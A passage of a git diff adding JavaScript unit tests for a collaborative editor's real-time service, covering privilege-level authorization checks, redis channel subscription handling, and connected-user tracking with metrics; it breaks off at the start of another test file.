this.client.ol_context.privilege_level = 'readAndWrite' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the review privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'review' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the owner privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'owner' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + return it('should return an error with any other privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'unknown' + return this.AuthorizationManager.assertClientCanViewProject( + this.client, + error => { + error.message.should.equal('not authorized') + return done() + } + ) + }) + }) + + describe('assertClientCanEditProject', function () { + it('should not allow the readOnly privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readOnly' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + error.message.should.equal('not authorized') + return done() + } + ) + }) + + it('should allow the readAndWrite privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'readAndWrite' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + it('should allow the owner privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'owner' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + return it('should return an error with any other privilegeLevel', function (done) { + this.client.ol_context.privilege_level = 'unknown' + return this.AuthorizationManager.assertClientCanEditProject( + this.client, + error => { + error.message.should.equal('not authorized') + return done() + } + ) + }) + }) + + // check doc access for project + + describe('assertClientCanViewProjectAndDoc', function () { + beforeEach(function () { + this.doc_id = '12345' + this.callback = sinon.stub() + return (this.client.ol_context = {}) + }) + + describe('when not authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'unknown') + }) + + it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + + return describe('even when authorised at the doc level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + + return describe('when authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readOnly') + }) + + describe('and not authorised at the document level', function () { + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + + describe('and authorised at the document level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should allow access', function () { + this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + this.callback + ) + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when document authorisation is added and then removed', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + () => { + return this.AuthorizationManager.removeAccessToDoc( + this.client, + this.doc_id, + done + ) + } + ) + }) + + return it('should deny access', function () { + return this.AuthorizationManager.assertClientCanViewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + }) + + describe('assertClientCanEditProjectAndDoc', function () { + beforeEach(function () { + this.doc_id = '12345' + this.callback = sinon.stub() + return (this.client.ol_context = {}) + }) + + describe('when not authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readOnly') + }) + + it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + + return describe('even when authorised at the doc level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + + return describe('when authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readAndWrite') + }) + + describe('and not authorised at the document level', function () { + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + + describe('and authorised at the document level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should allow access', function () { + this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + this.callback + ) + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when document authorisation is added and then removed', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + () => { + return this.AuthorizationManager.removeAccessToDoc( + this.client, + this.doc_id, + done + ) + } + ) + }) + + return it('should deny access', function () { + return this.AuthorizationManager.assertClientCanEditProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + }) + + return describe('assertClientCanReviewProjectAndDoc', function () { + beforeEach(function () { + this.doc_id = '12345' + this.callback = sinon.stub() + return (this.client.ol_context = {}) + }) + + describe('when not authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'readOnly') + }) + + it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + + return describe('even when authorised at the doc level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + + return describe('when authorised at the project level', function () { + beforeEach(function () { + return (this.client.ol_context.privilege_level = 'review') + }) + + describe('and not authorised at the document level', function () { + return it('should not allow access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + + describe('and authorised at the document level', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + done + ) + }) + + return it('should allow access', function () { + this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + this.callback + ) + return this.callback.calledWith(null).should.equal(true) + }) + }) + + return describe('when document authorisation is added and then removed', function () { + beforeEach(function (done) { + return this.AuthorizationManager.addAccessToDoc( + this.client, + this.doc_id, + () => { + return this.AuthorizationManager.removeAccessToDoc( + this.client, + this.doc_id, + done + ) + } + ) + }) + + return it('should deny access', function () { + return this.AuthorizationManager.assertClientCanReviewProjectAndDoc( + this.client, + this.doc_id, + err => err.message.should.equal('not authorized') + ) + }) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/ChannelManagerTests.js b/services/real-time/test/unit/js/ChannelManagerTests.js new file mode 100644 index 0000000..2e51c58 --- /dev/null +++ b/services/real-time/test/unit/js/ChannelManagerTests.js @@ -0,0 +1,432 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { expect } = require('chai') +const sinon = require('sinon') +const modulePath = '../../../app/js/ChannelManager.js' +const SandboxedModule = require('sandboxed-module') + +describe('ChannelManager', function () { + beforeEach(function () { + this.rclient = {} + this.other_rclient = {} + return (this.ChannelManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.settings = {}), + '@overleaf/metrics': (this.metrics = { + inc: sinon.stub(), + summary: sinon.stub(), + }), + }, + })) + }) + + describe('subscribe', function () { + describe('when there is no existing subscription for this redis client', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should subscribe to the redis channel', function () { + return this.rclient.subscribe + .calledWithExactly('applied-ops:1234567890abcdef') + .should.equal(true) + }) + }) + + describe('when there is an existing subscription for this redis client', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should subscribe to the redis channel again', function () { + return this.rclient.subscribe.callCount.should.equal(2) + }) + }) + + describe('when subscribe errors', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon + .stub() + .onFirstCall() + .rejects(new Error('some redis error')) + .onSecondCall() + .resolves() + const p = this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + p.then(() => done(new Error('should not subscribe but fail'))).catch( + err => { + err.message.should.equal('failed to subscribe to channel') + err.cause.message.should.equal('some redis error') + this.ChannelManager.getClientMapEntry(this.rclient) + .has('applied-ops:1234567890abcdef') + .should.equal(false) + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + // subscribe is wrapped in Promise, delay other assertions + return setTimeout(done) + } + ) + return null + }) + + it('should have recorded the error', function () { + return expect( + this.metrics.inc.calledWithExactly('subscribe.failed.applied-ops') + ).to.equal(true) + }) + + it('should subscribe again', function () { + return this.rclient.subscribe.callCount.should.equal(2) + }) + + return it('should cleanup', function () { + return this.ChannelManager.getClientMapEntry(this.rclient) + .has('applied-ops:1234567890abcdef') + .should.equal(false) + }) + }) + + describe('when subscribe errors and the clientChannelMap entry was replaced', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon + .stub() + .onFirstCall() + .rejects(new Error('some redis error')) + .onSecondCall() + .resolves() + this.first = this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + // ignore error + this.first.catch(() => {}) + expect( + this.ChannelManager.getClientMapEntry(this.rclient).get( + 'applied-ops:1234567890abcdef' + ) + ).to.equal(this.first) + + this.rclient.unsubscribe = sinon.stub().resolves() + this.ChannelManager.unsubscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.second = this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + // should get replaced immediately + expect( + this.ChannelManager.getClientMapEntry(this.rclient).get( + 'applied-ops:1234567890abcdef' + ) + ).to.equal(this.second) + + // let the first subscribe error -> unsubscribe -> subscribe + return setTimeout(done) + }) + + return it('should cleanup the second subscribePromise', function () { + return expect( + this.ChannelManager.getClientMapEntry(this.rclient).has( + 'applied-ops:1234567890abcdef' + ) + ).to.equal(false) + }) + }) + + return describe('when there is an existing subscription for another redis client but not this one', function () { + beforeEach(function (done) { + this.other_rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.other_rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.rclient.subscribe = sinon.stub().resolves() // discard the original stub + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should subscribe to the redis channel on this redis client', function () { + return this.rclient.subscribe + .calledWithExactly('applied-ops:1234567890abcdef') + .should.equal(true) + }) + }) + }) + + describe('unsubscribe', function () { + describe('when there is no existing subscription for this redis client', function () { + beforeEach(function (done) { + this.rclient.unsubscribe = sinon.stub().resolves() + this.ChannelManager.unsubscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should unsubscribe from the redis channel', function () { + return this.rclient.unsubscribe.called.should.equal(true) + }) + }) + + describe('when there is an existing subscription for this another redis client but not this one', function () { + beforeEach(function (done) { + this.other_rclient.subscribe = sinon.stub().resolves() + this.rclient.unsubscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.other_rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.ChannelManager.unsubscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should still unsubscribe from the redis channel on this client', function () { + return this.rclient.unsubscribe.called.should.equal(true) + }) + }) + + describe('when unsubscribe errors and completes', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.rclient.unsubscribe = sinon + .stub() + .rejects(new Error('some redis error')) + this.ChannelManager.unsubscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + setTimeout(done) + return null + }) + + it('should have cleaned up', function () { + return this.ChannelManager.getClientMapEntry(this.rclient) + .has('applied-ops:1234567890abcdef') + .should.equal(false) + }) + + return it('should not error out when subscribing again', function (done) { + const p = this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + p.then(() => done()).catch(done) + return null + }) + }) + + describe('when unsubscribe errors and another client subscribes at the same time', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + let rejectSubscribe + this.rclient.unsubscribe = () => + new Promise((resolve, reject) => (rejectSubscribe = reject)) + this.ChannelManager.unsubscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + + setTimeout(() => { + // delay, actualUnsubscribe should not see the new subscribe request + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + .then(() => setTimeout(done)) + .catch(done) + return setTimeout(() => + // delay, rejectSubscribe is not defined immediately + rejectSubscribe(new Error('redis error')) + ) + }) + return null + }) + + it('should have recorded the error', function () { + return expect( + this.metrics.inc.calledWithExactly('unsubscribe.failed.applied-ops') + ).to.equal(true) + }) + + it('should have subscribed', function () { + return this.rclient.subscribe.called.should.equal(true) + }) + + return it('should have discarded the finished Promise', function () { + return this.ChannelManager.getClientMapEntry(this.rclient) + .has('applied-ops:1234567890abcdef') + .should.equal(false) + }) + }) + + return describe('when there is an existing subscription for this redis client', function () { + beforeEach(function (done) { + this.rclient.subscribe = sinon.stub().resolves() + this.rclient.unsubscribe = sinon.stub().resolves() + this.ChannelManager.subscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + this.ChannelManager.unsubscribe( + this.rclient, + 'applied-ops', + '1234567890abcdef' + ) + return setTimeout(done) + }) + + return it('should unsubscribe from the redis channel', function () { + return this.rclient.unsubscribe + .calledWithExactly('applied-ops:1234567890abcdef') + .should.equal(true) + }) + }) + }) + + return describe('publish', function () { + describe("when the channel is 'all'", function () { + beforeEach(function () { + this.rclient.publish = sinon.stub() + return this.ChannelManager.publish( + this.rclient, + 'applied-ops', + 'all', + 'random-message' + ) + }) + + return it('should publish on the base channel', function () { + return this.rclient.publish + .calledWithExactly('applied-ops', 'random-message') + .should.equal(true) + }) + }) + + describe('when the channel has an specific id', function () { + describe('when the individual channel setting is false', function () { + beforeEach(function () { + this.rclient.publish = sinon.stub() + this.settings.publishOnIndividualChannels = false + return this.ChannelManager.publish( + this.rclient, + 'applied-ops', + '1234567890abcdef', + 'random-message' + ) + }) + + return it('should publish on the per-id channel', function () { + this.rclient.publish + .calledWithExactly('applied-ops', 'random-message') + .should.equal(true) + return this.rclient.publish.calledOnce.should.equal(true) + }) + }) + + return describe('when the individual channel setting is true', function () { + beforeEach(function () { + this.rclient.publish = sinon.stub() + this.settings.publishOnIndividualChannels = true + return this.ChannelManager.publish( + this.rclient, + 'applied-ops', + '1234567890abcdef', + 'random-message' + ) + }) + + return it('should publish on the per-id channel', function () { + this.rclient.publish + .calledWithExactly('applied-ops:1234567890abcdef', 'random-message') + .should.equal(true) + return this.rclient.publish.calledOnce.should.equal(true) + }) + }) + }) + + return describe('metrics', function () { + beforeEach(function () { + this.rclient.publish = sinon.stub() + return this.ChannelManager.publish( + this.rclient, + 'applied-ops', + 'all', + 'random-message' + ) + }) + + return it('should track the payload size', function () { + return this.metrics.summary + .calledWithExactly( + 'redis.publish.applied-ops', + 'random-message'.length + ) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/ConnectedUsersManagerTests.js b/services/real-time/test/unit/js/ConnectedUsersManagerTests.js new file mode 100644 index 0000000..a686407 --- /dev/null +++ b/services/real-time/test/unit/js/ConnectedUsersManagerTests.js @@ -0,0 +1,648 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ + +const SandboxedModule = require('sandboxed-module') +const assert = require('node:assert') +const path = require('node:path') +const sinon = require('sinon') +const modulePath = path.join(__dirname, '../../../app/js/ConnectedUsersManager') +const { expect } = require('chai') +const tk = require('timekeeper') + +describe('ConnectedUsersManager', function () { + beforeEach(function () { + tk.freeze(new Date()) + this.settings = { + redis: { + realtime: { + key_schema: { + clientsInProject({ project_id: projectId }) { + return `clients_in_project:${projectId}` + }, + connectedUser({ project_id: projectId, client_id: clientId }) { + return `connected_user:${projectId}:${clientId}` + }, + projectNotEmptySince({ projectId }) { + return `projectNotEmptySince:{${projectId}}` + }, + }, + }, + }, + } + this.rClient = { + auth() {}, + getdel: sinon.stub(), + scard: sinon.stub(), + set: sinon.stub(), + setex: sinon.stub(), + sadd: sinon.stub(), + get: sinon.stub(), + srem: sinon.stub(), + del: sinon.stub(), + smembers: sinon.stub(), + expire: sinon.stub(), + hset: sinon.stub(), + hgetall: sinon.stub(), + exec: sinon.stub(), + multi: () => { + return this.rClient + }, + } + this.Metrics = { + inc: sinon.stub(), + histogram: sinon.stub(), + } + + this.ConnectedUsersManager = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': this.settings, + '@overleaf/metrics': this.Metrics, + '@overleaf/redis-wrapper': { + createClient: () => { + return this.rClient + }, + }, + }, + }) + this.client_id = '32132132' + this.project_id = 'dskjh2u21321' + this.user = { + _id: 'user-id-123', + first_name: 'Joe', + last_name: 'Bloggs', + email: 'joe@example.com', + } + return (this.cursorData = { + row: 12, + column: 9, + doc_id: '53c3b8c85fee64000023dc6e', + }) + }) + + afterEach(function () { + return tk.reset() + }) + + describe('updateUserPosition', function () { + beforeEach(function () { + this.rClient.exec.yields(null, [1, 1]) + }) + + it('should set a key with the date and give it a ttl', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'last_updated_at', + Date.now() + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the user_id', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'user_id', + this.user._id + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the first_name', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'first_name', + this.user.first_name + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the last_name', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'last_name', + this.user.last_name + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set a key with the email', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'email', + this.user.email + ) + .should.equal(true) + return done() + } + ) + }) + + it('should push the client_id on to the project list', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.sadd + .calledWith(`clients_in_project:${this.project_id}`, this.client_id) + .should.equal(true) + return done() + } + ) + }) + + it('should add a ttl to the project set so it stays clean', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.expire + .calledWith( + `clients_in_project:${this.project_id}`, + 24 * 4 * 60 * 60 + ) + .should.equal(true) + return done() + } + ) + }) + + it('should add a ttl to the connected user so it stays clean', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + null, + err => { + if (err) return done(err) + this.rClient.expire + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 60 * 15 + ) + .should.equal(true) + return done() + } + ) + }) + + it('should set the cursor position when provided', function (done) { + return this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + this.cursorData, + err => { + if (err) return done(err) + this.rClient.hset + .calledWith( + `connected_user:${this.project_id}:${this.client_id}`, + 'cursorData', + JSON.stringify(this.cursorData) + ) + .should.equal(true) + return done() + } + ) + }) + + describe('editing_session_mode', function () { + const cases = { + 'should bump the metric when connecting to empty room': { + nConnectedClients: 1, + cursorData: null, + labels: { + method: 'connect', + status: 'single', + }, + }, + 'should bump the metric when connecting to non-empty room': { + nConnectedClients: 2, + cursorData: null, + labels: { + method: 'connect', + status: 'multi', + }, + }, + 'should bump the metric when updating in empty room': { + nConnectedClients: 1, + cursorData: { row: 42 }, + labels: { + method: 'update', + status: 'single', + }, + }, + 'should bump the metric when updating in non-empty room': { + nConnectedClients: 2, + cursorData: { row: 42 }, + labels: { + method: 'update', + status: 'multi', + }, + }, + } + + for (const [ + name, + { nConnectedClients, cursorData, labels }, + ] of Object.entries(cases)) { + it(name, function (done) { + this.rClient.exec.yields(null, [1, nConnectedClients]) + this.ConnectedUsersManager.updateUserPosition( + this.project_id, + this.client_id, + this.user, + cursorData, + err => { + if (err) return done(err) + expect(this.Metrics.inc).to.have.been.calledWith( + 'editing_session_mode', + 1, + labels + ) + done() + } + ) + }) + } + }) + }) + + describe('markUserAsDisconnected', function () { + beforeEach(function () { + this.rClient.exec.yields(null, [1, 0]) + }) + + it('should remove the user from the set', function (done) { + return this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + this.rClient.srem + .calledWith(`clients_in_project:${this.project_id}`, this.client_id) + .should.equal(true) + return done() + } + ) + }) + + it('should delete the connected_user string', function (done) { + return this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + this.rClient.del + .calledWith(`connected_user:${this.project_id}:${this.client_id}`) + .should.equal(true) + return done() + } + ) + }) + + it('should add a ttl to the connected user set so it stays clean', function (done) { + return this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + this.rClient.expire + .calledWith( + `clients_in_project:${this.project_id}`, + 24 * 4 * 60 * 60 + ) + .should.equal(true) + return done() + } + ) + }) + + describe('editing_session_mode', function () { + const cases = { + 'should bump the metric when disconnecting from now empty room': { + nConnectedClients: 0, + labels: { + method: 'disconnect', + status: 'empty', + }, + }, + 'should bump the metric when disconnecting from now single room': { + nConnectedClients: 1, + labels: { + method: 'disconnect', + status: 'single', + }, + }, + 'should bump the metric when disconnecting from now multi room': { + nConnectedClients: 2, + labels: { + method: 'disconnect', + status: 'multi', + }, + }, + } + + for (const [name, { nConnectedClients, labels }] of Object.entries( + cases + )) { + it(name, function (done) { + this.rClient.exec.yields(null, [1, nConnectedClients]) + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.Metrics.inc).to.have.been.calledWith( + 'editing_session_mode', + 1, + labels + ) + done() + } + ) + }) + } + }) + + describe('projectNotEmptySince', function () { + it('should clear the projectNotEmptySince key when empty and skip metric if not set', function (done) { + this.rClient.exec.yields(null, [1, 0]) + this.rClient.getdel.yields(null, '') + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.getdel).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}` + ) + expect(this.Metrics.histogram).to.not.have.been.called + done() + } + ) + }) + it('should clear the projectNotEmptySince key when empty and record metric if set', function (done) { + this.rClient.exec.onFirstCall().yields(null, [1, 0]) + tk.freeze(1_234_000) + this.rClient.getdel.yields(null, '1230') + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.getdel).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}` + ) + expect(this.Metrics.histogram).to.have.been.calledWith( + 'project_not_empty_since', + 4, + sinon.match.any, + { status: 'empty' } + ) + done() + } + ) + }) + it('should set projectNotEmptySince key when single and skip metric if not set before', function (done) { + this.rClient.exec.onFirstCall().yields(null, [1, 1]) + tk.freeze(1_233_001) // should ceil up + this.rClient.exec.onSecondCall().yields(null, ['']) + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.set).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}`, + '1234', + 'NX', + 'EX', + 31 * 24 * 60 * 60 + ) + expect(this.Metrics.histogram).to.not.have.been.called + done() + } + ) + }) + const cases = { + 'should set projectNotEmptySince key when single and record metric if set before': + { + nConnectedClients: 1, + labels: { + status: 'single', + }, + }, + 'should set projectNotEmptySince key when multi and record metric if set before': + { + nConnectedClients: 2, + labels: { + status: 'multi', + }, + }, + } + for (const [name, { nConnectedClients, labels }] of Object.entries( + cases + )) { + it(name, function (done) { + this.rClient.exec.onFirstCall().yields(null, [1, nConnectedClients]) + tk.freeze(1_235_000) + this.rClient.exec.onSecondCall().yields(null, ['1230']) + this.ConnectedUsersManager.markUserAsDisconnected( + this.project_id, + this.client_id, + err => { + if (err) return done(err) + expect(this.rClient.set).to.have.been.calledWith( + `projectNotEmptySince:{${this.project_id}}`, + '1235', + 'NX', + 'EX', + 31 * 24 * 60 * 60 + ) + expect(this.Metrics.histogram).to.have.been.calledWith( + 'project_not_empty_since', + 5, + sinon.match.any, + labels + ) + done() + } + ) + }) + } + }) + }) + + describe('_getConnectedUser', function () { + it('should return a connected user if there is a user object', function (done) { + const cursorData = JSON.stringify({ cursorData: { row: 1 } }) + this.rClient.hgetall.callsArgWith(1, null, { + connected_at: new Date(), + user_id: this.user._id, + last_updated_at: `${Date.now()}`, + cursorData, + }) + return this.ConnectedUsersManager._getConnectedUser( + this.project_id, + this.client_id, + (err, result) => { + if (err) return done(err) + result.connected.should.equal(true) + result.client_id.should.equal(this.client_id) + return done() + } + ) + }) + + it('should return a not connected user if there is no object', function (done) { + this.rClient.hgetall.callsArgWith(1, null, null) + return this.ConnectedUsersManager._getConnectedUser( + this.project_id, + this.client_id, + (err, result) => { + if (err) return done(err) + result.connected.should.equal(false) + result.client_id.should.equal(this.client_id) + return done() + } + ) + }) + + return it('should return a not connected user if there is an empty object', function (done) { + this.rClient.hgetall.callsArgWith(1, null, {}) + return this.ConnectedUsersManager._getConnectedUser( + this.project_id, + this.client_id, + (err, result) => { + if (err) return done(err) + result.connected.should.equal(false) + result.client_id.should.equal(this.client_id) + return done() + } + ) + }) + }) + + return describe('getConnectedUsers', function () { + beforeEach(function () { + this.users = ['1234', '5678', '9123', '8234'] + this.rClient.smembers.callsArgWith(1, null, this.users) + this.ConnectedUsersManager._getConnectedUser = sinon.stub() + this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[0]) + .callsArgWith(2, null, { + connected: true, + client_age: 2, + client_id: this.users[0], + }) + this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[1]) + .callsArgWith(2, null, { + connected: false, + client_age: 1, + client_id: this.users[1], + }) + this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[2]) + .callsArgWith(2, null, { + connected: true, + client_age: 3, + client_id: this.users[2], + }) + return this.ConnectedUsersManager._getConnectedUser + .withArgs(this.project_id, this.users[3]) + .callsArgWith(2, null, { + connected: true, + client_age: 11, + client_id: this.users[3], + }) + }) // connected but old + + return it('should only return the users in the list which are still in redis and recently updated', function (done) { + return this.ConnectedUsersManager.getConnectedUsers( + this.project_id, + (err, users) => { + if (err) return done(err) + users.length.should.equal(2) + users[0].should.deep.equal({ + client_id: this.users[0], + client_age: 2, + connected: true, + }) + users[1].should.deep.equal({ + client_id: this.users[2], + client_age: 3, + connected: true, + }) + return done() + } + ) + }) + }) +}) diff --git a/services/real-time/test/unit/js/DocumentUpdaterControllerTests.js b/services/real-time/test/unit/js/DocumentUpdaterControllerTests.js new file mode 100644 index 0000000..dd34c62 --- /dev/null +++ b/services/real-time/test/unit/js/DocumentUpdaterControllerTests.js @@ -0,0 +1,259 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + 